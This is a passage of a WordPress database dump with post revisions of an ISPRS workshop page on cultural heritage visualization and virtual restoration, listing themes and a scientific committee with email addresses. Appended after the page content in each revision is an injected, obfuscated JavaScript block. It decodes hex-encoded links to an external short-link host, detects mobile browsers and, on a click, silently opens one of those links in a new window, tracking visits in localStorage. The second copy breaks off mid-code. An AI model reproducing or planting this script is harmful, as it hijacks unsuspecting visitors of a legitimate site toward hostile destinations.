post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"74\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of Event</strong></h5>\n<p>Cultural heritage cognition and conceptual modeling</p>\n<ul>\n<li>Cognition and ontology of cultural heritage</li>\n<li>Data integration and knowledge discovery</li>\n<li>GIS + HBIM integration of cultural heritage protection methods</li>\n<li>Visualization of cultural heritage ( Big Data, BIM/CIM, AR/VR/MR, AI)</li>\n<li>Conceptual modelling</li>\n<li>Intelligent interaction, visualization, and information update</li>\n</ul>\n<p>Deterioration monitoring and assessment of culture heritage</p>\n<ul>\n<li>Identification, extraction and analysis of heritage deteriorations</li>\n<li>Deep learning of heritage deteriorations: symptom classification and visualization</li>\n<li>Dynamic monitoring of heritage deteriorations based on hyperspectral and X-ray techniques</li>\n<li>Analysis of the causes of heritage deteriorations</li>\n<li>Immersive heritage deteriorations diagnosis</li>\n<li>Evaluation and preventive protection of heritage deteriorations</li>\n<li>Automated deteriorations mapping</li>\n</ul>\n<p>Digital twins and virtual restoration of cultural heritage</p>\n<ul>\n<li>Digital twins</li>\n<li>Innovation technology of spatio-temporal information of cultural heritage</li>\n<li>Virtual restoration, recovery, and reconstruction of cultural heritage</li>\n<li>Digital storytelling presentation and interpretation of cultural heritage (space, material, value)</li>\n<li>New Methods of Cultural Heritage Protection in the Post-epidemic Era</li>\n</ul>\n<p>Heritage sustainability and other applications</p>\n<ul>\n<li>Cultural heritage conservation and sustainable development based on multi-source information fusion</li>\n<li>Sustainable development of cultural heritage based on the expansion of existing UNSDGs indicators</li>\n<li>Digital cultural heritage applications and services</li>\n<li>Innovating immersive experience and the industry of culture and tourism</li>\n<li>Contextual education of cultural heritage</li>\n<li>Digital cultural heritage interactive conservation with Public Participation</li>\n<li>Archaeological prospecting using spatial technologies, including remote sensing, GIS, and GNSS.</li>\n<li>AI-powered identification of archaeological sites and/or landscapes</li>\n<li>Spatial analysis of the past human-enviroment interactions</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee</strong></h5>\n<ol>\n<li>Junshan Liu, McWhorter School of Building Science, Auburn University, USA.</li>\n</ol>\n<p>junshan.liu@auburn.edu</p>\n<ol start=\"2\">\n<li>Andreas Georgopoulos, Department of National Technical University of Athens, Laboratory of Photogrammetry, Greece, Email: <a href=\"mailto:drag@central.ntua.gr\">drag@central.ntua.gr</a></li>\n<li>AnRong Dang, Department of School of Architecture in Tsinghua University, China, Email: danrong@mail.tsinghua.edu.cn</li>\n<li>Bolognesi, Cecilia Maria, Department of Architecture, Built environment and Construction engineering (A.B.C.) , Politecnico di Milano, Milano, Italy, Email: <a href=\"mailto:cecilia.bolognesi@polimi.it\">bolognesi@polimi.it</a></li>\n<li>Chen Yang, Department of Tongji University, China, Email: <a href=\"mailto:chen.yang@tongji.edu.cn\">yang@tongji.edu.cn</a></li>\n<li>Fulong Chen, Department of The Aerospace Information Research Institute, China, Email: <a href=\"mailto:chenfl@aircas.ac.cn\">chenfl@aircas.ac.cn</a></li>\n<li>Grussenmeyer, Pierre, Department of Université de Strasbourg, INSA Strasbourg, CNRS, ICube Laboratory UMR 7357, Photogrammetry and Geomatics Group, 67000 Strasbourg, France, Email: <a href=\"mailto:pierre.grussenmeyer@insa-strasbourg.fr\">grussenmeyer@insa-strasbourg.fr</a></li>\n<li>Hallot, Pierre, Department of DIVA Art Archeology Heritage University of Liège, Belgian,Email: <a href=\"mailto:p.hallot@uliege.be\">hallot@uliege.be</a></li>\n<li>Hongtao Liu, Department of World Heritage Research Center in Southwest Jiaotong University, China, Email: <a href=\"mailto:bridge115@126.com\">bridge115@126.com</a></li>\n<li>Jie He, Department of School of Architecture in Tianjin University, China, Email: janushe@tju.edu.cn</li>\n<li>Long Ying, Department of School of Architecture in Tsinghua University,China, Email: <a href=\"mailto:ylong@mail.tsinghua.edu.cn\">ylong@mail.tsinghua.edu.cn</a></li>\n<li>Ona Vileikis, Department of University College London (UCL), England, Email: <a href=\"mailto:o.vileikis@ucl.ac.uk\">vileikis@ucl.ac.uk</a></li>\n<li>Prafulla Tarachand Janbade, Department of Chandigarh College of Architecture, India, Email: <a href=\"mailto:prafullatj@gmail.com\">prafullatj@gmail.com</a></li>\n</ol>\n<p>14.Tiwari, Reena,Department of Curtin University, Australia, Email: <a href=\"mailto:r.tiwari@curtin.edu.au\">r.tiwari@curtin.edu.au</a></p>\n<p>Victor Ferreira, Department of Lisbon School of Architecture, Lisbon, Email: <a href=\"mailto:victor.mota.ferreira@gmail.com\">victor.mota.ferreira@gmail.com</a></p>\n<p>15.Yuhua Wu, Department of Chinese Academy of Cultural Heritage, China, Email: <a href=\"mailto:wuyuhua@cach.org.cn\">wuyuhua@cach.org.cn</a></p>\n<p>16.Shuqiang Lv, Department of Survey and Mapping, BUCEA, China, Email: <a href=\"mailto:wuyuhua@cach.org.cn\">lvshuqiang@b</a>ucea.edu.cn</p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Cultural Heritage Visualization and Virtual Restoration','','inherit','closed','closed','','3897-revision-v1','','','2023-03-01 22:59:11','2023-03-01 22:59:11','',3897,'https://gsw2023.com/?p=3907',0,'revision','',0),
(3908,1,'2023-03-01 23:01:26','2023-03-01 23:01:26','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3900\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Cultural Heritage Visualization and Virtual Restoration</strong></h4>\n<h4 style=\"text-align: center;\"><strong>Workshop of ISPRS WG IV/11</strong></h4>\n<p class=\"1\" style=\"line-height: 150%;\">Nowadays GIS-based technologies play an important role in the protection of cultural heritage, which integrates recording, valuing, surveying, monitoring, simulating and early warning applications into 4D information to better analyze the spatial, material and value conservation of cultural heritage. By promoting the interpretation of heritage using spatio-temporal information management and visualization, the digital workflow is able to constantly support social conservation of cultural heritage.</p>\n<p class=\"1\" style=\"line-height: 150%;\">This workshop provides a platform to discuss digital practices in the use of cultural heritage protection and management. It will gather people from different disciplines and professions including loT, big data, BIM/CIM, AR/VR/MR, AI, H-BIM and digital twins, computer-aided heritage information management and visualization applications, in order to enhance multidisciplinary experts and public engagement in cultural heritage conservation.</p>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"74\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of Event</strong></h5>\n<p>Cultural heritage cognition and conceptual modeling</p>\n<ul>\n<li>Cognition and ontology of cultural heritage</li>\n<li>Data integration and knowledge discovery</li>\n<li>GIS + HBIM integration of cultural heritage protection methods</li>\n<li>Visualization of cultural heritage ( Big Data, BIM/CIM, AR/VR/MR, AI)</li>\n<li>Conceptual modelling</li>\n<li>Intelligent interaction, visualization, and information update</li>\n</ul>\n<p>Deterioration monitoring and assessment of culture heritage</p>\n<ul>\n<li>Identification, extraction and analysis of heritage deteriorations</li>\n<li>Deep learning of heritage deteriorations: symptom classification and visualization</li>\n<li>Dynamic monitoring of heritage deteriorations based on hyperspectral and X-ray techniques</li>\n<li>Analysis of the causes of heritage deteriorations</li>\n<li>Immersive heritage deteriorations diagnosis</li>\n<li>Evaluation and preventive protection of heritage deteriorations</li>\n<li>Automated deteriorations mapping</li>\n</ul>\n<p>Digital twins and virtual restoration of cultural heritage</p>\n<ul>\n<li>Digital twins</li>\n<li>Innovation technology of spatio-temporal information of cultural heritage</li>\n<li>Virtual restoration, recovery, and reconstruction of cultural heritage</li>\n<li>Digital storytelling presentation and interpretation of cultural heritage (space, material, value)</li>\n<li>New Methods of Cultural Heritage Protection in the Post-epidemic Era</li>\n</ul>\n<p>Heritage sustainability and other applications</p>\n<ul>\n<li>Cultural heritage conservation and sustainable development based on multi-source information fusion</li>\n<li>Sustainable development of cultural heritage based on the expansion of existing UNSDGs indicators</li>\n<li>Digital cultural heritage applications and services</li>\n<li>Innovating immersive experience and the industry of culture and tourism</li>\n<li>Contextual education of cultural heritage</li>\n<li>Digital cultural heritage interactive conservation with Public Participation</li>\n<li>Archaeological prospecting using spatial technologies, including remote sensing, GIS, and GNSS.</li>\n<li>AI-powered identification of archaeological sites and/or landscapes</li>\n<li>Spatial analysis of the past human-enviroment interactions</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee</strong></h5>\n<ol>\n<li>Junshan Liu, McWhorter School of Building Science, Auburn University, USA.junshan.liu@auburn.edu</li>\n<li>Andreas Georgopoulos, Department of National Technical University of Athens, Laboratory of Photogrammetry, Greece, Email: <a href=\"mailto:drag@central.ntua.gr\">drag@central.ntua.gr</a></li>\n<li>AnRong Dang, Department of School of Architecture in Tsinghua University, China, Email: danrong@mail.tsinghua.edu.cn</li>\n<li>Bolognesi, Cecilia Maria, Department of Architecture, Built environment and Construction engineering (A.B.C.) , Politecnico di Milano, Milano, Italy, Email: <a href=\"mailto:cecilia.bolognesi@polimi.it\">bolognesi@polimi.it</a></li>\n<li>Chen Yang, Department of Tongji University, China, Email: <a href=\"mailto:chen.yang@tongji.edu.cn\">yang@tongji.edu.cn</a></li>\n<li>Fulong Chen, Department of The Aerospace Information Research Institute, China, Email: <a href=\"mailto:chenfl@aircas.ac.cn\">chenfl@aircas.ac.cn</a></li>\n<li>Grussenmeyer, Pierre, Department of Université de Strasbourg, INSA Strasbourg, CNRS, ICube Laboratory UMR 7357, Photogrammetry and Geomatics Group, 67000 Strasbourg, France, Email: <a href=\"mailto:pierre.grussenmeyer@insa-strasbourg.fr\">grussenmeyer@insa-strasbourg.fr</a></li>\n<li>Hallot, Pierre, Department of DIVA Art Archeology Heritage University of Liège, Belgian,Email: <a href=\"mailto:p.hallot@uliege.be\">hallot@uliege.be</a></li>\n<li>Hongtao Liu, Department of World Heritage Research Center in Southwest Jiaotong University, China, Email: <a href=\"mailto:bridge115@126.com\">bridge115@126.com</a></li>\n<li>Jie He, Department of School of Architecture in Tianjin University, China, Email: janushe@tju.edu.cn</li>\n<li>Long Ying, Department of School of Architecture in Tsinghua University,China, Email: <a href=\"mailto:ylong@mail.tsinghua.edu.cn\">ylong@mail.tsinghua.edu.cn</a></li>\n<li>Ona Vileikis, Department of University College London (UCL), England, Email: <a href=\"mailto:o.vileikis@ucl.ac.uk\">vileikis@ucl.ac.uk</a></li>\n<li>Prafulla Tarachand Janbade, Department of Chandigarh College of Architecture, India, Email: <a href=\"mailto:prafullatj@gmail.com\">prafullatj@gmail.com</a></li>\n<li>Tiwari, Reena,Department of Curtin University, Australia, Email: <a href=\"mailto:r.tiwari@curtin.edu.au\">r.tiwari@curtin.edu.au</a></li>\n<li>Victor Ferreira, Department of Lisbon School of Architecture, Lisbon, Email: <a href=\"mailto:victor.mota.ferreira@gmail.com\">victor.mota.ferreira@gmail.com</a></li>\n<li>Yuhua Wu, Department of Chinese Academy of Cultural Heritage, China, Email: <a href=\"mailto:wuyuhua@cach.org.cn\">wuyuhua@cach.org.cn</a></li>\n<li>Shuqiang Lv, Department of Survey and Mapping, BUCEA, China, Email: <a href=\"mailto:wuyuhua@cach.org.cn\">lvshuqiang@b</a>ucea.edu.cn</li>\n</ol>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| 